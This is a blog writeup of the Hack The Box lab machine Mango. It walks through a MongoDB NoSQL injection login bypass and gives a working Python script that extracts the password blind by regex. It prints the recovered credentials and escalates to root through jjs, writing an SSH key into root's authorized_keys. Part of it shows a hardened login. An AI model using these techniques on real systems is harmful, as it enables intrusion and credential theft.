Hack The Box – Mango Writeup | 10.10.10.162

Hello, I’m back with another Hack The Box writeup, this time for the active machine Mango. Mango is a medium-difficulty Linux machine.

Let's start by adding 10.10.10.162 to the /etc/hosts file as mango.htb.

➜  mango nmap -Pn -A -p- mango.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 21:56 +03
Nmap scan report for mango.htb (10.10.10.162)
Host is up (0.13s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/27%OT=22%CT=1%CU=40958%PV=Y%DS=2%DC=T%G=Y%TM=5DB5BB
OS:DC%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   130.60 ms 10.10.14.1
2   130.83 ms mango.htb (10.10.10.162)
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

So, I found three useful ports: SSH on 22, and HTTP on 80 and 443. I started with the default web page, but there was nothing there; the HTTPS page, however, revealed a search-engine-like page.

Other than this page, nothing interesting was found, so I went on to investigate the certificate, because I had seen “staging-order.mango.htb” in the nmap results. Since the certificate named that subdomain, I immediately added it to /etc/hosts. Browsing to staging-order.mango.htb opened a simple login page:

After analyzing the web page I found that the box is running MongoDB as its backend database. MongoDB is a NoSQL database, so to exploit it we need a NoSQL injection technique.

Looking for MongoDB NoSQL injections, I found that PayloadsAllTheThings ( https://github.com/swisskyrepo/PayloadsAllTheThings ) has a NoSQL injection section. The GitHub repo covers NoSQL blind injections, which might help me.

Before the exploit, I logged in on the page and intercepted the request using Burp Suite. I appended [$ne] to the username and password parameter names and forwarded the request. The MongoDB backend was vulnerable, because I got /home.php without a valid password. So, I was sure that I could exploit the database using PayloadsAllTheThings.
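To show why the [$ne] trick works, here is an added Python illustration (not code from this writeup or from the box) of how a PHP-style login handler turns password[$ne] into a MongoDB query operator, beside a hardened version that rejects non-string input. The users document, the form parser and the tiny query matcher are constructed stand-ins for the real collection and server.

```python
import re

# Constructed sample document standing in for the users collection on the box.
USERS = [{"username": "mango", "password": "h3mXK8RhU~f{]f5H"}]


def php_parse_form(pairs):
    """Mimic PHP's $_POST: 'password[$ne]=x' becomes {'password': {'$ne': 'x'}}."""
    result = {}
    for key, value in pairs:
        m = re.fullmatch(r"(\w+)\[([^\]]*)\]", key)
        if m:
            result.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            result[key] = value
    return result


def matches(doc_value, condition):
    """Tiny subset of MongoDB matching: plain equality, $ne and $regex."""
    if not isinstance(condition, dict):
        return doc_value == condition
    if "$ne" in condition:
        return doc_value != condition["$ne"]
    if "$regex" in condition:
        return re.search(condition["$regex"], doc_value) is not None
    return False


def find_one(filt):
    for doc in USERS:
        if all(matches(doc.get(k), v) for k, v in filt.items()):
            return doc
    return None


def login_vulnerable(form):
    # Operator injection: form values go straight into the query filter, so a
    # nested {'$ne': 'x'} is evaluated as an operator instead of a password.
    return find_one({"username": form["username"], "password": form["password"]})


def login_hardened(form):
    # Reject anything that is not a plain string before it reaches the query.
    u, p = form.get("username"), form.get("password")
    if not isinstance(u, str) or not isinstance(p, str):
        return None
    return find_one({"username": u, "password": p})
```

The same type check also defeats the $regex probing used for blind extraction, since the regex never reaches the database.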

I made a Python script using this repo (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#extract-data-information).

Here is my script:

import string
import requests
import urllib3

urllib3.disable_warnings()

username = 'mango'
u = 'http://staging-order.mango.htb'

# Step 1: find the password length. The regex .{n} matches any password with at
# least n characters, so the first n that fails is one past the real length.
password_len = 0
print("searching length")
while True:
    payload = {
        "username": username,
        "password[$regex]": ".{" + str(password_len) + "}",
        "login": "login"
    }
    print("trying length {0}".format(password_len))
    r = requests.post(u, payload)
    if 'admin@mango.htb' not in r.text:
        break
    password_len += 1
password_len -= 1
print("password length: {0}".format(password_len))

# Step 2: recover the password one character at a time with an anchored prefix
# regex. Regex metacharacters are skipped rather than escaped.
password = ''
while len(password) != password_len:
    for c in string.printable:
        if c in ['*', '+', '.', '?', '|', '#', '&', '$']:
            continue
        payload = {
            "username": username,
            "password[$regex]": "^{0}{1}".format(password, c),
            "login": "login"
        }
        print("trying {0}".format(password + c))
        r = requests.post(u, payload)
        if 'admin@mango.htb' in r.text:
            password += c
            break
    else:
        # No candidate matched at this position: stop instead of looping forever.
        print("no character matched at position {0}".format(len(password)))
        break
print("password = {0}".format(password))

After failing several times, I managed to get the script working and found the credentials of user mango:

mango:h3mXK8RhU~f{]f5H

I connected over SSH to mango.htb as user mango and got access.

➜  mango ssh mango@10.10.10.162
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Nov  6 20:00:10 UTC 2019

  System load:  0.0                Processes:            102
  Usage of /:   25.9% of 19.56GB   Users logged in:      0
  Memory usage: 17%                IP address for ens33: 10.10.10.162
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.


Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ 
mango@mango:~$ 
mango@mango:~$ cd /home
mango@mango:/home$ ls
admin  mango
mango@mango:/home$ cd admin
mango@mango:/home/admin$ ls
user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied

I tried to read user.txt already, but access was denied, so I need admin’s credentials to read the user.txt file. I got a hint from someone in the HTB forum that the admin credentials are stored in MongoDB and that I can get them easily.

Getting User.txt

A simple Google search showed me the commands to retrieve the stored credentials; here they are:

mango@mango:/home$ mongo
MongoDB shell version v4.0.12
connecting to: mongodb://127.0.0.1:27017/?gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("d1043da0-88f1-4c13-b80e-b6de2ab48e9b") }
MongoDB server version: 4.0.12
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	http://docs.mongodb.org/
Questions? Try the support group
	http://groups.google.com/group/mongodb-user
Server has startup warnings: 
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] 
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2019-11-05T21:14:32.932+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] 
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2019-11-05T21:14:39.575+0000 I CONTROL  [initandlisten] 
---
Enable MongoDB's free cloud-based monitoring service, which will then receive and display
metrics about your deployment (disk utilization, CPU, operation statistics, etc).

The monitoring data will be available on a MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB may use this information to make product
improvements and to suggest MongoDB products and deployment options to you.

To enable free monitoring, run the following command: db.enableFreeMonitoring()
To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---

> show databases
admin   0.000GB
config  0.000GB
local   0.000GB
mango   0.000GB
> use mango
switched to db mango
> show tables
users
> db.users.find().pretty()
{
	"_id" : ObjectId("5d8e25334f3bf1432628927b"),
	"username" : "admin",
	"password" : "t9KcS3>!0B#2"
}
{
	"_id" : ObjectId("5d8e25364f3bf1432628927c"),
	"username" : "mango",
	"password" : "h3mXK8RhU~f{]f5H"
}

Ok, here I got user.txt using the credentials I obtained above.

mango@mango:/home$ su admin
Password: 
$ 
$ ls
admin  mango
$ cd admin
$ ls
user.txt
$ 
$ cat user.txt
79bf3[xxxxxxxxxx]47e92
$ 

Now, as admin, I have SUID binaries available, and I have permission to run /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs. I found out that I can run it with the -scripting flag and execute system commands from there. Eventually, I will get root that way. So, I’m going to inject my RSA public key first.

admin@mango:/home/admin$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs -scripting
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> $EXEC("echo 'ssh-rsa AAAAB3NzaC1[--SNIP---]6J7JmtiJM=' > /root/.ssh/authorized_keys");
jjs>

Getting Root.txt

➜  mango ssh -i /root/.ssh/id_rsa mango.htb
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
122 packages can be updated.
18 updates are security updates.
 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# cat root.txt
8a8ef79[xxxxxxxxxx]4e9ab15
root@mango:~#

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect on my profile: https://www.hackthebox.eu/nav1n

Comments

d3fconnull, 3 months ago:

Hi Navin, which terminal/bash do you use? I love that color scheme. Great articles.
